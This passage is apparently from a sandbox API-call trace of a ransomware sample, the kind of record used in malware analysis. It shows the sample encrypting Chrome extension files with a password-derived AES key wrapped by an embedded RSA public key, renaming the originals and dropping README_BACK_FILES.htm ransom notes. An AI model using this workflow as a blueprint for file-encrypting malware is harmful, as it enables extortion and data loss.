(in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0250.926] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x29898d0) returned 1 [0250.927] CryptImportPublicKeyInfo (in: hCryptProv=0x29898d0, dwCertEncodingType=0x1, pInfo=0x2992020*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992050*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992058*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2984220) returned 1 [0250.927] CryptEncrypt (in: hKey=0x2984220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0250.927] CryptEncrypt (in: hKey=0x2984220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29896b0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x29896b0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0250.927] WriteFile (in: hFile=0x5d60, lpBuffer=0x29896b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x29896b0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0250.928] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.210] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.210] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.540] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.540] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.540] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.540] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.540] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.540] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.540] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.541] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.541] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.541] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.541] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.541] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.541] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.541] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.542] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.542] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.542] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.542] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.542] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.542] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.542] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.542] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0251.542] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0251.542] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x1d5, lpOverlapped=0x0) returned 1 [0251.542] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x1d5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x1e0) returned 1 [0251.542] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x1e0, lpOverlapped=0x0) returned 1 [0251.542] CloseHandle (hObject=0x5d5c) returned 1 [0251.542] CloseHandle (hObject=0x5d60) returned 1 [0251.543] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0251.546] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0251.546] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.gsg")) returned 1 [0251.547] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.fuck")) returned 1 [0251.549] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0251.549] CryptDestroyKey (hKey=0x2985ea0) returned 1 [0251.549] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0251.549] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0251.549] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.549] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0251.549] AreFileApisANSI () returned 1 [0251.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 152 [0251.549] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0251.550] GetFileType (hFile=0x5d50) returned 0x1 [0251.550] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0251.564] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0251.564] FindClose (in: hFindFile=0x29385b8 | out: hFindFile=0x29385b8) returned 1 [0251.565] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\readme_back_files.htm")) returned 0xffffffff [0251.565] AreFileApisANSI () returned 1 [0251.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296f120, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 142 [0251.565] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0251.565] GetFileType (hFile=0x5d4c) returned 0x1 [0251.566] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0251.567] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0251.567] FindClose (in: hFindFile=0x29384f8 | out: hFindFile=0x29384f8) returned 1 [0251.567] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\readme_back_files.htm")) returned 0xffffffff [0251.567] AreFileApisANSI () returned 1 [0251.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296f120, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0251.567] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0251.572] GetFileType (hFile=0x5d40) returned 0x1 [0251.572] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0251.573] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0251.574] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2985ea0 [0251.580] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0251.580] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0251.580] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x2985f20 [0251.613] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0251.613] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0251.613] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0251.613] GetLastError () returned 0x0 [0251.613] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png")) returned 0x20 [0251.614] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png", dwFileAttributes=0x80) returned 1 [0251.614] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0251.616] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.617] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.gsg", dwFileAttributes=0x2) returned 1 [0251.617] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x29892f8) returned 1 [0251.619] CryptCreateHash (in: hProv=0x29892f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0251.619] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0251.619] CryptHashData (hHash=0x2985a20, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.619] CryptDeriveKey (in: hProv=0x29892f8, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29840e0) returned 1 [0251.619] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.619] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0251.620] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2989628) returned 1 [0251.620] CryptImportPublicKeyInfo (in: hCryptProv=0x2989628, dwCertEncodingType=0x1, pInfo=0x2992290*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29922c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29922c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x29841e0) returned 1 [0251.620] CryptEncrypt (in: hKey=0x29841e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0251.620] CryptEncrypt (in: hKey=0x29841e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2989848*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2989848*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0251.620] WriteFile (in: hFile=0x5d60, lpBuffer=0x2989848*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2989848*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0251.621] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0251.642] CryptEncrypt (in: hKey=0x29840e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, 